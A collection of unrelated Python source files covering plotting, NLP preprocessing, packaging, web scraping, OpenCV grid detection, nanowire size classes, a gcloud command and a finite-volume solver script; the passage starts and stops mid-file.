plt.plot(z[0][0], u, 'o', mfc="none", ms=7, mew=2)
plt.plot(x, y, 'k--')
plt.legend(['prediction', 'maxima data (ind. points)', 'data'])
plt.subplot(3, 1, 2)
plt.plot(x, envelope, 'k--')
plt.legend(['envelope'], loc=1)
plt.twinx()
plot_predict(x=xtest, mean=mu_a[0], var=var_a[0], z=m.za[0].value, latent=True)
plt.legend(['prediction', 'inducing points'], loc=2)
plt.subplot(3, 1, 3)
plt.plot(x, component, 'k--')
plt.legend(['component'], loc=1)
plt.twinx()
plot_predict(x=xtest, mean=mu_c[0], var=var_c[0], z=m.zc[0].value)
plt.legend(['prediction', 'inducing points'], loc=2)
plt.savefig("demo-modgp.png")
plt.show()
|
import time
import math
import unicodedata
import torch
import re
try:
from .config import MAX_LENGTH, EOS_token
except ImportError:
from config import MAX_LENGTH, EOS_token
def asMinutes(s):
    """Format a duration in seconds as 'Xm Ys'."""
    minutes, seconds = divmod(s, 60)
    return '%dm %ds' % (minutes, seconds)


def timeSince(since, percent):
    """Return "elapsed (- remaining)" for a run that is `percent` complete.

    `since` is a time.time() start stamp; the remaining time is estimated
    by linear extrapolation: total = elapsed / percent.
    """
    elapsed = time.time() - since
    estimated_total = elapsed / percent
    remaining = estimated_total - elapsed
    return '%s (- %s)' % (asMinutes(elapsed), asMinutes(remaining))
# Simple English sentence openers; only target sentences starting with one
# of these are kept, to shrink the training vocabulary.
eng_prefixes = (
    "i am ", "i m ",
    "he is", "he s ",
    "she is", "she s ",
    "you are", "you re ",
    "we are", "we re ",
    "they are", "they re "
)


def filterPair(p):
    """Keep a (source, target) pair only when both sides have fewer than
    MAX_LENGTH space-separated words and the target starts with one of
    the simple English prefixes."""
    source_short = len(p[0].split(' ')) < MAX_LENGTH
    target_short = len(p[1].split(' ')) < MAX_LENGTH
    return source_short and target_short and p[1].startswith(eng_prefixes)


def filterPairs(pairs):
    """Return only the pairs accepted by filterPair."""
    return [candidate for candidate in pairs if filterPair(candidate)]
def indexesFromSentence(lang, sentence):
    """Map each space-separated word of `sentence` to its vocabulary index."""
    return [lang.word2index[token] for token in sentence.split(' ')]


def tensorFromSentence(lang, sentence, device):
    """Encode a sentence as a column tensor of word indexes ending in EOS."""
    token_ids = indexesFromSentence(lang, sentence)
    token_ids.append(EOS_token)
    return torch.tensor(token_ids, dtype=torch.long, device=device).view(-1, 1)


def tensorsFromPair(input_lang, output_lang, pair, device):
    """Encode a (source, target) sentence pair as a pair of index tensors."""
    return (
        tensorFromSentence(input_lang, pair[0], device),
        tensorFromSentence(output_lang, pair[1], device),
    )
# Turn a Unicode string to plain ASCII, thanks to
# https://stackoverflow.com/a/518232/2809427
def unicodeToAscii(s):
    """Drop combining marks after NFD decomposition, leaving plain ASCII."""
    decomposed = unicodedata.normalize('NFD', s)
    return ''.join(ch for ch in decomposed if unicodedata.category(ch) != 'Mn')


# Lowercase, trim, and remove non-letter characters
def normalizeString(s):
    """Lowercase/trim, detach .!? with a space, collapse everything else."""
    cleaned = unicodeToAscii(s.lower().strip())
    cleaned = re.sub(r"([.!?])", r" \1", cleaned)
    return re.sub(r"[^a-zA-Z.!?]+", r" ", cleaned)
def filterComment(s):
    """Return True for lines carrying the CC-BY license marker."""
    license_marker = "CC-BY"
    return s.startswith(license_marker)
'''
Author : now more
Connect : lin.honghui@qq.com
LastEditors : now more
Description : build_transforms
LastEditTime: 2019-07-06 20:07:26
'''
from .build import *
|
"""A setuptools-based setup module for kairos-yaml."""
from pathlib import Path
from setuptools import find_packages, setup
import sdf
# Long description for PyPI, taken verbatim from the README.
long_description = Path("README.md").read_text(encoding="utf-8")
# Trove classifiers describing maturity, audience, license and scope.
classifiers = [
    "Development Status :: 4 - Beta",
    "Environment :: Console",
    "Intended Audience :: Developers",
    "License :: OSI Approved :: MIT License",
    "Operating System :: OS Independent",
    "Programming Language :: Python :: 3",
    "Programming Language :: Python :: 3.7",
    "Topic :: Scientific/Engineering",
    "Topic :: Scientific/Engineering :: Artificial Intelligence",
    "Topic :: Software Development :: Libraries",
    "Topic :: Software Development :: Libraries :: Python Modules",
    "Topic :: Utilities",
    "Typing :: Typed",
]
# Relax the exact pins in requirements.txt ("==") to minimum versions
# (">=") so installing this package does not over-constrain consumers.
requirements = [
    req.replace("==", ">=")
    for req in Path("requirements.txt").read_text(encoding="utf-8").splitlines()
]
setup(
    name="kairos-yaml",
    # Version and description live in the sdf package itself.
    version=sdf.__version__,
    description=sdf.__description__,
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/isi-vista/kairos-yaml",
    author="USC Information Sciences Institute and Carnegie Mellon University",
    author_email="ahedges@isi.edu",
    license="MIT",
    classifiers=classifiers,
    install_requires=requirements,
    python_requires=">=3.7",
    packages=find_packages(),
    # Ship the py.typed marker so type checkers use the inline annotations.
    package_data={"sdf": ["py.typed"]},
    entry_points={
        "console_scripts": [
            "yaml2sdf=sdf.yaml2sdf:main",
            "yaml_v1_to_v2=sdf.yaml_v1_to_v2:main",
        ]
    },
)
|
from gazette.spiders.base import FecamGazetteSpider
class ScGuabirubaSpider(FecamGazetteSpider):
    """Spider for official gazettes of Guabiruba (SC) via the FECAM portal."""
    name = "sc_guabiruba"
    # FECAM search query restricting results to this municipality.
    FECAM_QUERY = 'entidade:"Prefeitura municipal de Guabiruba"'
    # NOTE(review): presumably the IBGE territory code for Guabiruba — confirm.
    TERRITORY_ID = "4206306"
|
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 19 18:28:05 2021
@author: amrut
"""
import math
import cv2
import numpy as np
#import matplotlib.pyplot as plt
#import pytesseract
class ImageDataTransform:
    """OpenCV preprocessing steps for locating and rectifying a grid
    (e.g. a sudoku board) in a photo.

    Most methods take the image to transform as an explicit argument
    rather than operating on ``self.img``.
    """
    def __init__(self, img):
        # Source image kept for reference; methods receive images explicitly.
        self.img = img

    def resize(self, im):
        """Resize to a fixed 1000x1000 canvas."""
        im = cv2.resize(im, (1000, 1000))
        return im

    def grayscale(self, im):
        """Convert BGR input to single-channel grayscale."""
        im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
        return im

    def gaussian_blur(self, im):
        """Light 1x5 Gaussian blur to suppress noise before thresholding."""
        im = cv2.GaussianBlur(im, (1, 5), 0)
        return im

    def threshold(self, im):
        """Adaptive inverse-binary threshold (local Gaussian neighborhood)."""
        # threshold determined adaptively, max values rounded to 255
        im = cv2.adaptiveThreshold(im, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,
                                   cv2.THRESH_BINARY_INV, 15, 2)
        return im

    def canny(self, im):
        """Canny edge detection.

        BUG FIX: `self` was missing from the signature, so calling
        ``inst.canny(im)`` raised TypeError (every other method takes self).
        """
        im = cv2.Canny(im, 60, 180)
        return im

    def max_contour(self, im):
        """Return the contour with the largest area in `im`."""
        im = np.uint8(im)
        cnts, _ = cv2.findContours(im, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
        shapes = sorted(cnts, key=cv2.contourArea, reverse=True)
        max_cnt = shapes[0]
        return max_cnt

    # source: https://www.pyimagesearch.com/2014/08/25/4-point-opencv-getperspective-transform-example/
    def vertex_coords(self, polygon):
        """Return INDICES (tl, tr, bl, br) of the polygon's corner points.

        Corners are found by extremizing x+y (tl/br) and x-y (bl/tr).
        `polygon` is an OpenCV contour: a sequence of [[x, y]] points.
        """
        br_candidates = [coord[0][0] + coord[0][1] for coord in polygon]
        br = max(range(len(br_candidates)), key=br_candidates.__getitem__)
        bl_candidates = [coord[0][0] - coord[0][1] for coord in polygon]
        bl = min(range(len(bl_candidates)), key=bl_candidates.__getitem__)
        tr_candidates = [coord[0][0] - coord[0][1] for coord in polygon]
        tr = max(range(len(tr_candidates)), key=tr_candidates.__getitem__)
        tl_candidates = [coord[0][0] + coord[0][1] for coord in polygon]
        tl = min(range(len(tl_candidates)), key=tl_candidates.__getitem__)
        return (tl, tr, bl, br)

    def morph(self, im):
        """Morphological opening with a 2x2 kernel (removes small specks)."""
        kernel = np.ones((2, 2), np.uint8)
        morp = cv2.morphologyEx(im, cv2.MORPH_OPEN, kernel)
        return morp

    def dilate(self, im):
        """Dilate twice with a 1x3 kernel (thickens horizontal strokes)."""
        kernel = np.ones((1, 3), np.uint8)
        img_dil = cv2.dilate(im, kernel, iterations=2)
        return img_dil

    def euclidean_dist(self, pt1, pt2):
        """Euclidean distance between two (x, y) points."""
        dist_sq = (pt2[0] - pt1[0]) ** 2 + (pt2[1] - pt1[1]) ** 2
        dist = math.sqrt(dist_sq)
        return dist

    def perspective_new_coords(self, vertices):
        """Given corner POINTS (tl, tr, bl, br), return the axis-aligned
        destination coordinates plus the target width and height."""
        tl, tr, bl, br = vertices
        width1 = self.euclidean_dist(tl, tr)
        width2 = self.euclidean_dist(bl, br)
        max_width = int(max(width1, width2))
        height1 = self.euclidean_dist(tl, bl)
        height2 = self.euclidean_dist(tr, br)
        max_height = int(max(height1, height2))
        new_coords = [[0, 0], [max_width, 0],
                      [0, max_height], [max_width, max_height]]
        return new_coords, max_width, max_height

    # credit: https://stackoverflow.com/questions/59182827/how-to-get-the-cells-of-a-sudoku-grid-with-opencv
    def remove_grid(self, im):
        """Whiten out the grid lines by detecting long horizontal and
        vertical structures and painting over them."""
        horizontal_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 1))
        detected_lines = cv2.morphologyEx(im, cv2.MORPH_OPEN, horizontal_kernel, iterations=1)
        cnts = cv2.findContours(detected_lines, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
        vertical_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (1, 5))
        detected_lines = cv2.morphologyEx(im, cv2.MORPH_OPEN, vertical_kernel, iterations=1)
        cnts2 = cv2.findContours(detected_lines, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
        # BUG FIX: previously indexed cnts2 based on len(cnts) (copy-paste);
        # harmless in practice since findContours returns tuples of equal
        # arity, but now each result selects from its own tuple.
        cnts2 = cnts2[0] if len(cnts2) == 2 else cnts2[1]
        for c in cnts2:
            cv2.drawContours(im, [c], -1, (255, 255, 255), 3)
        cnts = cnts[0] if len(cnts) == 2 else cnts[1]
        for c in cnts:
            cv2.drawContours(im, [c], -1, (255, 255, 255), 3)
        return im

    def perspective_shift(self, im, grid_contour):
        """Warp `im` so the quadrilateral `grid_contour` becomes an
        axis-aligned rectangle (bird's-eye view)."""
        tl_idx, tr_idx, bl_idx, br_idx = self.vertex_coords(grid_contour)
        orig_coords = [grid_contour[tl_idx][0], grid_contour[tr_idx][0],
                       grid_contour[bl_idx][0], grid_contour[br_idx][0]]
        new_coords, nw, nh = self.perspective_new_coords(orig_coords)
        mat_trans = cv2.getPerspectiveTransform(np.float32(orig_coords),
                                                np.float32(new_coords))
        adjust_im = cv2.warpPerspective(im, mat_trans, (nw, nh))
        return adjust_im

    def preprocess(self, im, grid):
        """Full pipeline: resize, grayscale, blur, threshold, and — when
        `grid` is truthy — rectify the largest contour and dilate.

        When `grid` is falsy only the grayscale image is returned.
        """
        resized_im = self.resize(im)
        gs_im = self.grayscale(resized_im)
        blurred = self.gaussian_blur(gs_im)
        thresh = self.threshold(blurred)
        if not grid:
            return gs_im
        grid_contour = self.max_contour(thresh)
        bird_eye_im = self.perspective_shift(thresh, grid_contour)
        bird_eye_im = self.resize(bird_eye_im)
        invert_col = cv2.bitwise_not(bird_eye_im)
        dilated_im = self.dilate(invert_col)
        return dilated_im
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2016, Jianfeng Chen <jchen37@ncsu.edu>
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import division
from deap.tools import emo
from Benchmarks.POM3 import pre_defined
from repeats import request_new_file
import time
import random
import pdb
import debug
def action(model):
    """Random-search baseline: evaluate 10,000 random individuals on
    `model`, non-dominated-sort them, and dump the first front's fitness
    values (with start/finish timestamps) to a fresh results file.

    Returns the full front structure from emo.sortNondominated.
    """
    start_time = time.time()
    # generating the 10k random solutions
    candidates = [model.Individual([random.random() for _ in range(model.decsNum)])
                  for _ in range(10000)]
    print('random sol created.')
    for can in candidates:
        model.eval(can)
    print('finish evaluating.')
    res = emo.sortNondominated(candidates, len(candidates), True)
    print('finish selection.')
    finish_time = time.time()
    with open(request_new_file('./tse_rs/god', model.name), 'w') as f:
        f.write('T:' + str(start_time) + '\n~~~\n')
        f.write('T:' + str(finish_time) + '\n')
        for front in res[0]:
            f.write(' '.join(map(str, front.fitness.values)))
            f.write('\n')
        f.write('~~~\n')
    return res
if __name__ == '__main__':
    # Run the random-search baseline once over the first three
    # pre-defined POM3 model variants.
    for repeat in range(1):
        ii = [0, 1, 2]
        for i in ii:
            print(i)
            POM3_model = pre_defined()[i]
            res = action(POM3_model)
            print('****** ' + str(repeat) + ' ******')
|
from sims.sim_info_tests import SimInfoTest
import caches
import sims.sim_info_types
@caches.cached
def get_disallowed_ages(affordance):
    """Return the set of Ages excluded by the affordance's SimInfoTests.

    An age is disallowed when some SimInfoTest with a non-None `ages`
    attribute does not list it. Results are memoized via @caches.cached.
    """
    disallowed = set()
    for test in affordance.test_globals:
        if not isinstance(test, SimInfoTest) or test.ages is None:
            continue
        disallowed.update(age for age in sims.sim_info_types.Age
                          if age not in test.ages)
    return disallowed
|
# DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#67. Add Binary
#Given two binary strings, return their sum (also a binary string).
#The input strings are both non-empty and contain only the characters 1 or 0.
#Example 1:
#Input: a = "11", b = "1"
#Output: "100"
#Example 2:
#Input: a = "1010", b = "1011"
#Output: "10101"
#class Solution:
# def addBinary(self, a, b):
# """
# :type a: str
# :type b: str
# :rtype: str
# """
# Time Is Money |
# Names of the size-related attributes recognized across the size classes.
SIZE_PROPERTIES = [
    "scale",
    "width",
    "length",
    "unit_dz",
    "period",
    "fraction",
    "area",
    "n_xy",
    "nz",
    "q",
    "indexer"
]
class NanowireSizeCompound:
    """
    A size container that combines one or more NanowireSize objects.

    Only keyword arguments whose names appear in SIZE_PROPERTIES are
    stored; any other keyword is silently ignored.
    """
    def __init__(self, **kwargs):
        for key, value in kwargs.items():
            if key in SIZE_PROPERTIES:
                setattr(self, key, value)
    def __str__(self):
        # BUG FIX: the header previously read "<NanowireSize instance>",
        # misidentifying this class; derive the name from the type instead.
        s = "<{} instance>\n".format(type(self).__name__)
        s_args = []
        for prop, val in self.props().items():
            try:
                # Whole numbers print without decimals; other numerics
                # with two places; non-numeric values fall through to repr.
                if int(val) == val:
                    s_args.append("<\t{:<10}: {:<15,d}>".format(prop, int(val)))
                else:
                    s_args.append("<\t{:<10}: {:<15,.2f}>".format(prop, val))
            except TypeError:
                s_args.append("<\t{:<10}: {}>".format(prop, val))
        s += "\n".join(s_args)
        return s
    def props(self):
        """Return a dict of the size properties set on this instance."""
        return {prop: getattr(self, prop)
                for prop in SIZE_PROPERTIES if hasattr(self, prop)}
class PlaneSize(object):
    """
    A size information handler for planar lattices.

    At least one of `n_xy` / `width` must be supplied; the missing one is
    derived lazily via calculator functions (`_n_xy_func`, `_width_func`,
    `_area_func`). Those callables are initialized to None here, so they
    are presumably assigned externally after construction — TODO confirm
    where they are set.
    """
    def __init__(self, scale, n_xy=None, width=None):
        """
        :param scale: lattice scale (ex: lattice constant)
        :param n_xy: structure specific integer thickness index indicating width
        :param width: width in same units as `a0`
        """
        if not (width or n_xy):
            raise ValueError("must specify either `n_xy` or `width`")
        if scale <= 0:
            raise ValueError("`scale` must be a positive number")
        self._scale = scale
        if n_xy is not None and n_xy <= 0:
            raise ValueError("`n_xy` must be a positive integer")
        self._n_xy = n_xy
        if width is not None and width <= 0:
            raise ValueError("`width` must be a positive number")
        self._width = width
        # size calculator functions (assigned externally; None until then)
        self._n_xy_func = None
        self._width_func = None
        self._area_func = None
    def __str__(self):
        return (self.__repr__() + "\n"
                "scale: {:<20}\n"
                "n_xy : {:<20}\n"
                "width: {:<20}\n"
                "area : {:<20}"
                ).format(self.scale, self.n_xy, self.width, self.area)
    @property
    def n_xy(self):
        # Lazily derived from the stored width when not given at construction.
        if self._n_xy is None:
            self._n_xy = self._n_xy_func(self.scale, self._width)
        return self._n_xy
    @property
    def width(self):
        # NOTE(review): always recomputed via `_width_func`, even when an
        # explicit `width` was passed to __init__ — confirm this is intended.
        return self._width_func(self.scale, self.n_xy)
    @property
    def scale(self):
        return self._scale
    @property
    def area(self):
        return self._area_func(self.scale, self.n_xy)
class NanowireSize(PlaneSize):
    """
    A size information handler for nanowire lattices.

    Extends PlaneSize with a z-dimension: `nz` planes of height `unit_dz`
    (in units of `scale`). As with PlaneSize, the `_nz_func`,
    `_length_func` and `_area_func` calculators are assigned externally.
    """
    def __init__(self, scale, unit_dz, n_xy=None, nz=None,
                 width=None, length=None):
        """
        :param scale: lattice scale (ex: lattice constant)
        :param unit_dz: z-extent of one stacked plane, in units of `scale`
        :param nz: number of planes stacked along z-axis
        :param n_xy: structure specific integer thickness index indicating width
        :param length: length in same units as `a0`
        :param width: width in same units as `a0`
        """
        super().__init__(scale, n_xy, width)
        if not (nz or length):
            raise ValueError("must specify either `nz` or `length`")
        self._unit_dz = unit_dz
        self._nz = nz
        self._length = length
        # size calculator functions (assigned externally; None until then)
        self._nz_func = None
        self._length_func = None
    def __str__(self):
        s = "<NanowireSize instance>\n"
        s_args = []
        props = self.props()
        for prop, val in props.items():
            try:
                if int(val) == val:
                    # BUG FIX: previously formatted the raw value with the
                    # 'd' spec, which raises ValueError for whole floats
                    # (e.g. 3.0); convert to int first, matching
                    # NanowireSizeCompound.__str__.
                    s_args.append("<\t{:<10}: {:<15,d}>".format(prop, int(val)))
                else:
                    s_args.append("<\t{:<10}: {:<15,.2f}>".format(prop, val))
            except TypeError:
                s_args.append("<\t{:<10}: {}>".format(prop, val))
        s += "\n".join(s_args)
        return s
    def props(self):
        """Return a dict of the size properties set on this instance."""
        p_dict = {}
        for prop in SIZE_PROPERTIES:
            if hasattr(self, prop):
                p_dict[prop] = self.__getattribute__(prop)
        return p_dict
    @property
    def area(self):
        # NOTE(review): unlike PlaneSize.area, the calculator is called with
        # no arguments here — the two protocols differ; confirm intended.
        return self._area_func()
    @property
    def unit_dz(self):
        return self._unit_dz
    @property
    def nz(self):
        # Lazily derive the plane count from length when not given directly.
        if self._nz is None:
            self._nz = self._nz_func(self.scale, self._length, self.unit_dz)
        return self._nz
    @property
    def length(self):
        return self._length_func(self.scale, self.nz, self.unit_dz)
    def fix_nz(self, nz):
        """Force the plane count to `nz`, bypassing the calculator."""
        self._nz = nz
class NanowireSizeRandom(NanowireSize):
    """Size handler for randomized nanowire lattices; adds a `fraction`.

    NOTE(review): presumably `fraction` is a fill/porosity fraction in
    [0, 1] — it is not validated here; confirm against callers.
    """
    def __init__(self, scale, unit_dz, fraction, n_xy=None, nz=None,
                 width=None, length=None):
        super().__init__(scale, unit_dz, n_xy, nz, width, length)
        self._fraction = fraction
    @property
    def fraction(self):
        return self._fraction
class NanowireSizePeriodic(NanowireSize):
    """
    A size information handler for periodic nanowire lattices.

    Adds a periodicity described either by `q` or by `period`; whichever
    is missing is derived lazily via the externally-assigned `_q_func` /
    `_period_func` calculators (same protocol as the other size classes).
    """
    def __init__(self, scale, unit_dz, n_xy=None, nz=None, q=None,
                 width=None, length=None, period=None):
        super().__init__(scale, unit_dz, n_xy, nz, width, length)
        # Exactly zero is rejected for both parameters; only one of the
        # two needs to be provided.
        if q is None and period is None:
            raise ValueError("must specify either `q` or `period`")
        elif q == 0:
            raise ValueError("`q` set to zero")
        elif period == 0:
            raise ValueError("`period` set to zero")
        self._q = q
        self._q_func = None
        self._period = period
        self._period_func = None
    @property
    def q(self):
        # Lazily derived from the stored period when not given directly.
        if self._q is None:
            self._q = self._q_func(self.scale, self._period)
        return self._q
    @property
    def period(self):
        return self._period_func(self.scale, self.q)
class NanowireSizeArbitrary(NanowireSize):
    """
    A size information handler for arbitrary nanowire lattices.

    The plane index list is produced lazily by an externally-assigned
    `_indexer` callable, which receives `nz` and returns
    (new_nz_or_falsy, index_list); a truthy first element overrides nz.
    """
    def __init__(self, scale, unit_dz, n_xy=None, nz=None,
                 width=None, length=None):
        super().__init__(scale, unit_dz, n_xy, nz, width, length)
        self._index = None
        self._indexer = None
    @property
    def index(self):
        if self._index is None:
            new_nz, self._index = self._indexer(self.nz)
            if new_nz: # option to bypass forcing nz change
                self._nz = new_nz
        return self._index
    @property
    def indexer(self):
        return self._indexer
    def invert_index(self):
        """Mirror the index list about the wire's z-extent.

        NOTE(review): assumes `self._index` has already been computed
        (accessing `index` at least once); otherwise this raises TypeError.
        """
        self._index = [self.nz - idx for idx in self._index][::-1]
|
# Copyright 2014 Google Inc. All Rights Reserved.
"""Command for removing instances from target pools."""
from googlecloudsdk.calliope import exceptions as calliope_exceptions
from googlecloudsdk.compute.lib import base_classes
from googlecloudsdk.compute.lib import utils
class RemoveInstances(base_classes.NoOutputAsyncMutator):
  """Remove instances from a target pool."""

  @staticmethod
  def Args(parser):
    """Register the command's flags and positional arguments."""
    parser.add_argument(
        '--instances',
        help='Specifies a list of instances to remove from the target pool.',
        metavar='INSTANCE',
        nargs='+',
        required=True)
    utils.AddZoneFlag(
        parser,
        resource_type='instances',
        operation_type='remove from the target pool')
    parser.add_argument(
        'name',
        help='The name of the target pool from which to remove the instances.')

  @property
  def service(self):
    # API service that handles target-pool mutations.
    return self.compute.targetPools

  @property
  def method(self):
    # API verb issued for each request.
    return 'RemoveInstance'

  @property
  def resource_type(self):
    return 'targetPools'

  def CreateRequests(self, args):
    """Build the single RemoveInstance request for the instances' region."""
    instance_refs = self.CreateZonalReferences(
        args.instances, args.zone, resource_type='instances')
    instance_messages = [
        self.messages.InstanceReference(instance=ref.SelfLink())
        for ref in instance_refs]
    # This check to make sure the regions for the instances are the same is
    # not strictly necessary, but it allows a fast fail if the user passes
    # in instances from different regions.
    regions = {utils.ZoneNameToRegionName(ref.zone) for ref in instance_refs}
    if len(regions) > 1:
      raise calliope_exceptions.ToolException(
          'Instances must all be in the same region as the target pool.')
    target_pool_ref = self.CreateRegionalReference(
        args.name, regions.pop(),
        resource_type='targetPools')
    request = self.messages.ComputeTargetPoolsRemoveInstanceRequest(
        region=target_pool_ref.region,
        project=self.project,
        targetPool=target_pool_ref.Name(),
        targetPoolsRemoveInstanceRequest=(
            self.messages.TargetPoolsRemoveInstanceRequest(
                instances=instance_messages)))
    return [request]
RemoveInstances.detailed_help = {
'brief': 'Remove instances from a target pool',
'DESCRIPTION': """\
*{command}* is used to remove one or more instances from a
target pool.
For more information on health checks and load balancing, see
link:https://developers.google.com/compute/docs/load-balancing/[].
""",
}
|
#!/usr/bin/env python
import sys
sys.setdlopenflags(0x100|0x2)
import fvm
import fvm.fvmbaseExt as fvmbaseExt
import fvm.importers as importers
fvm.set_atype('double')
import math
if fvm.atype == 'double':
import fvm.models_atyped_double as models
import fvm.exporters_atyped_double as exporters
elif fvm.atype == 'tangent':
import fvm.models_atyped_tangent_double as models
import fvm.exporters_atyped_tangent_double as exporters
from FluentCase import FluentCase
from optparse import OptionParser
#fvmbaseExt.enableDebug("cdtor")
fileBase = None
numIterations = 1
# Hard-coded local case path. NOTE(review): this assignment overrides the
# None above, so the command-line fallback below (guarded by
# `fileBase is None`) can never fire — confirm whether that is intended.
fileBase = "/scratch/prism/shankha/memosa/src/fvm/test/CANT-SORDER/cbeam6/cbeam6"
#fileBase = "/home/sm/app-memosa/src/fvm/test/cav32"
#fileBase = "/home/sm/a/data/wj"
def usage():
    # Print command-line usage (Python 2 print statements) and exit
    # with a non-zero status.
    print "Usage: %s filebase [outfilename]" % sys.argv[0]
    print "Where filebase.cas is a Fluent case file."
    print "Output will be in filebase-prism.dat if it is not specified."
    sys.exit(1)
def advance(smodel, niter):
    """Advance the structure model one iteration at a time, up to `niter`
    iterations; Ctrl-C stops early instead of propagating."""
    for _ in range(niter):
        try:
            smodel.advance(1)
        except KeyboardInterrupt:
            break
def createBV4Fields(geomFields, meshes, id):
    """Build a per-face force field ('bvy') for the boundary group `id`.

    Every face of the matching group gets the constant value -1000./0.2
    (presumably a total load of -1000 spread over a 0.2-long edge —
    TODO confirm units).  Removed: two `xf = geomFields.coordinate[...]`
    assignments that were computed but never used (dead code).
    """
    fy = fvmbaseExt.Field('bvy')
    mesh = meshes[0]
    # Volume array only used as a template for newSizedClone below.
    vol = geomFields.volume[mesh.getCells()]
    for mesh in meshes:
        fgs = mesh.getBoundaryGroups()
        for fg in fgs:
            if fg.id == id:
                nFaces = fg.site.getCount()
                forceY = vol.newSizedClone(nFaces)
                forceYa = forceY.asNumPyArray()
                for i in range(0, nFaces):
                    forceYa[i] = -1000./0.2
                fy[fg.site] = forceY
    return fy
# change as needed
# map between fvm, tecplot, and xdmf types
# Integer element-type ids keyed by mesh-type name (NOTE(review):
# presumably consumed by the xdmf exporter — confirm).
etype = {
    'tri' : 1,
    'quad' : 2,
    'tetra' : 3,
    'hexa' : 4
}
# Tecplot ZONETYPE strings for the same mesh-type names; used by
# dumpTecplotFile when writing zone headers.
tectype = {
    'tri' : 'FETRIANGLE',
    'quad' : 'FEQUADRILATERAL',
    'tetra' : 'FETETRAHEDRON',
    'hexa' : 'FEBRICK'
}
def dumpTecplotFile(nmesh, meshes, geomFields, mtype):
    """Write cell-centered deformation/stress results to tecplot_cbeam4.dat
    in Tecplot BLOCK format.

    NOTE(review): reads the module-global `structureFields` rather than
    taking it as a parameter — the caller must have created the structure
    model first.  The nine original near-identical "write one variable"
    loops are factored into _writeColumn; output bytes are unchanged.
    """
    def _writeColumn(f, values):
        # Emit values five per line (Tecplot BLOCK packing), then a
        # terminating newline, exactly as the original inline loops did.
        for i in range(len(values)):
            f.write(str(values[i]) + " ")
            if i % 5 == 4:
                f.write("\n")
        f.write("\n")

    # Per-mesh site and connectivity objects.
    cellSites = [meshes[n].getCells() for n in range(nmesh)]
    faceSites = [meshes[n].getFaces() for n in range(nmesh)]
    nodeSites = [meshes[n].getNodes() for n in range(nmesh)]
    # Kept for parity with the original code although unused below.
    faceCells = [meshes[n].getConnectivity(faceSites[n], cellSites[n])
                 for n in range(nmesh)]
    cellNodes = [meshes[n].getCellNodes() for n in range(nmesh)]
    volumes = [geomFields.volume[cellSites[n]].asNumPyArray()
               for n in range(nmesh)]
    cellCentroids = [geomFields.coordinate[cellSites[n]].asNumPyArray()
                     for n in range(nmesh)]
    defFields = [structureFields.deformation[cellSites[n]].asNumPyArray()
                 for n in range(nmesh)]
    tractionXFields = [structureFields.tractionX[cellSites[n]].asNumPyArray()
                       for n in range(nmesh)]
    coords = [geomFields.coordinate[nodeSites[n]].asNumPyArray()
              for n in range(nmesh)]

    f = open("tecplot_cbeam4.dat", "w")
    f.write("Title = \" tecplot file for 2D Cavity problem \" \n")
    f.write("variables = \"x\", \"y\", \"z\", \"defX\", \"defY\", \"sigmaXX\", \"sigmaXY\", \"sigmaYY\", \"cellCentroidY\" \n")
    for n in range(nmesh):
        title_name = "nmesh%s" % n
        ncell = cellSites[n].getSelfCount()
        nnode = nodeSites[n].getCount()
        f.write("Zone T = \"%s\" N = %s E = %s DATAPACKING = BLOCK, VARLOCATION = ([4-9]=CELLCENTERED), ZONETYPE=%s\n" %
                (title_name, nodeSites[n].getCount(), ncell, tectype[mtype]))
        # Nodal coordinates x, y, z.
        for axis in range(3):
            _writeColumn(f, [coords[n][i][axis] for i in range(nnode)])
        # Cell-centered deformation components defX, defY.
        _writeColumn(f, [defFields[n][i][0] for i in range(ncell)])
        _writeColumn(f, [defFields[n][i][1] for i in range(ncell)])
        # Cell-centered stress components sigmaXX, sigmaXY, sigmaYY.
        _writeColumn(f, [tractionXFields[n][i][0] for i in range(ncell)])
        _writeColumn(f, [tractionXFields[n][i][1] for i in range(ncell)])
        _writeColumn(f, [tractionXFields[n][i][2] for i in range(ncell)])
        # Cell centroid y, written under the "cellCentroidY" variable.
        _writeColumn(f, [cellCentroids[n][i][1] for i in range(ncell)])
        # Connectivity: one line of 1-based node indices per cell.
        for i in range(ncell):
            for node in range(cellNodes[n].getCount(i)):
                f.write(str(cellNodes[n](i, node) + 1) + " ")
            f.write("\n")
        f.write("\n")
    f.close()
# Command-line options (legacy optparse interface).
parser = OptionParser()
parser.set_defaults(type='quad')
parser.add_option("--type", help="'quad'[default], 'tri', 'hexa', or 'tetra'")
parser.add_option("--xdmf", action='store_true', help="Dump data in xdmf")
parser.add_option("--time","-t",action='store_true',help="Print timing information.")
(options, args) = parser.parse_args()
outfile = None
# NOTE(review): fileBase is hard-coded above, so this argv fallback is
# currently dead code.
if __name__ == '__main__' and fileBase is None:
